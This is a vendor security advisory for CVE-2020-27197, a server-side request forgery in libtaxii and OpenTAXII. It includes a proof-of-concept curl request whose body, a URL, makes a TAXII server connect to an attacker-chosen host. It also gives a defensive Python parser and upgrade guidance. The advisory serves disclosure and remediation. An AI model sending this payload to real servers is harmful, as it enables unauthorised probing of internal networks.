EIQ-2020-0012

ID

EIQ-2020-0012

CVE

CVE-2020-27197

Description

libtaxii is vulnerable to server-side request forgery (SSRF).

Date

14 Oct 2020

Severity

2 - MEDIUM

CVSSv3 score

5.3 (Snyk score)

Status

✅ 2.9.0

Assessment

libtaxii versions 1.1.117 and earlier are vulnerable to SSRF.

It is possible to exploit the vulnerability by passing an http:// string (a URL) as the argument of the parse method.

The libtaxii parse method wraps the lxml library; it uses the library's etree module to parse data into an in-memory tree. Because the underlying lxml parser accepts a URL as its source and retrieves it, a string that starts with http:// is fetched instead of being parsed as XML content.

libtaxii is a dependency of EclecticIQ OpenTAXII, which is therefore also affected by the same vulnerability in versions 0.2.0 and earlier.

  • An attacker could exploit the vulnerability by sending a maliciously crafted TAXII request to a TAXII server.

  • The TAXII server would accept the request without verifying that the expected destination matches the actual one.

  • The TAXII server could then be deceived into connecting to arbitrary IP addresses or domains that the attacker controls.

The vulnerability can be exploited on any platform instance that runs a TAXII server.

To exploit the vulnerability, an attacker would not need to log in to the platform.

The following example uses cURL to demonstrate the exploit:

curl -i -s -k -X $'POST' \
    -H $'Host: 192.0.2.254' \
    -H $'Connection: close' \
    -H $'Accept-Encoding: gzip, deflate' \
    -H $'Accept: application/xml' \
    -H $'User-Agent: Cabby 0.1.20' \
    -H $'X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1' \
    -H $'X-TAXII-Services: urn:taxii.mitre.org:services:1.1' \
    -H $'X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1' \
    -H $'X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0' \
    -H $'Content-Type: application/xml' \
    -H $'Content-Length: 33' \
    --data-binary $'http://203.0.113.255?ssrf-exploit' \
    --url $'https://192.0.2.255/taxii/discovery'

  • 192.0.2.254 is the IP address of the server hosting a platform instance.

  • 192.0.2.255 is the IP address of the platform instance.

  • /taxii/discovery is the endpoint exposing the TAXII discovery service.

  • http://203.0.113.255?ssrf-exploit is the arbitrary address the platform TAXII server is deceived into connecting to.
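The defensive counterpart to the request above, as an added example that is not libtaxii's or OpenTAXII's own code: a TAXII server should hand the request body to the XML parser only as in-memory content, never as a "source" argument that a parser may interpret as a file name or URL. The example uses the standard-library parser so it runs stand-alone; the TAXII 1.1 namespace is the one libtaxii uses, and the sample bodies are constructed, not captured traffic.

```python
# Added example, not libtaxii code: parse a TAXII request body strictly as
# in-memory XML. With lxml the equivalent hardening is
# etree.fromstring(body, etree.XMLParser(no_network=True, resolve_entities=False))
# instead of etree.parse(source), which treats a string source as a file or URL.
import re
import xml.etree.ElementTree as ET

# TAXII 1.1 XML message binding namespace (urn:taxii.mitre.org:message:xml:1.1).
TAXII_11_NS = "http://taxii.mitre.org/messages/taxii_xml_binding-1.1"

# A body beginning with a URL scheme is the trigger shape from the advisory;
# a real TAXII message always begins with XML.
_SCHEME_RE = re.compile(rb"^\s*[A-Za-z][A-Za-z0-9+.-]*://")


def parse_taxii_message(body: bytes) -> ET.Element:
    """Return the root element of a TAXII 1.1 message, rejecting anything that
    is not XML content (URL-like strings, file paths, str objects)."""
    if not isinstance(body, bytes):
        # A str handed to a parse()-style API may be taken as a file name or URL.
        raise TypeError("message body must be bytes, not %s" % type(body).__name__)
    if _SCHEME_RE.match(body):
        raise ValueError("body looks like a URL, not an XML document")
    if not body.lstrip().startswith(b"<"):
        raise ValueError("body is not XML")
    # fromstring only parses the bytes it is given; it cannot fetch a source.
    root = ET.fromstring(body)
    if not root.tag.startswith("{%s}" % TAXII_11_NS):
        raise ValueError("not a TAXII 1.1 message: %s" % root.tag)
    return root


def message_type(body: bytes) -> str:
    """Local name of the TAXII message element, e.g. 'Discovery_Request'."""
    return parse_taxii_message(body).tag.split("}", 1)[1]


def check(body) -> str:
    """'ok' when the body is accepted, otherwise the rejecting exception name."""
    try:
        parse_taxii_message(body)
        return "ok"
    except (TypeError, ValueError) as exc:
        return type(exc).__name__


# Constructed sample bodies (not captured traffic).
GOOD_REQUEST = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<taxii_11:Discovery_Request xmlns:taxii_11="%s" message_id="1"/>'
) % TAXII_11_NS.encode()
SSRF_BODY = b"http://203.0.113.255?ssrf-exploit"  # payload shape from the advisory

if __name__ == "__main__":
    print(message_type(GOOD_REQUEST))
    for body in (SSRF_BODY, b"<notaxii/>", "http://203.0.113.255"):
        print(repr(body)[:40], "->", check(body))
```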

Mitigation

The vulnerability has been addressed and solved in libtaxii version 1.1.118.

From release 2.9.0, the platform and its OpenTAXII server component depend on libtaxii 1.1.118.

To address the vulnerability, we encourage upgrading the platform to release 2.9.0.

For platform releases 2.8.0 and earlier, it is possible to upgrade to libtaxii 1.1.118 within the platform virtual environment.

This dependency upgrade is compatible with EclecticIQ Platform releases 2.8.0 and earlier, and with OpenTAXII releases 0.2.0 and earlier.

To mitigate the issue in platform instances release 2.8.0 and earlier:

  • Restrict platform access to only trusted users.

  • Do not allow platform access from untrusted sources.

  • Do not allow external requests to localhost through the network loopback interface.

Affected versions

2.8.0 and earlier.
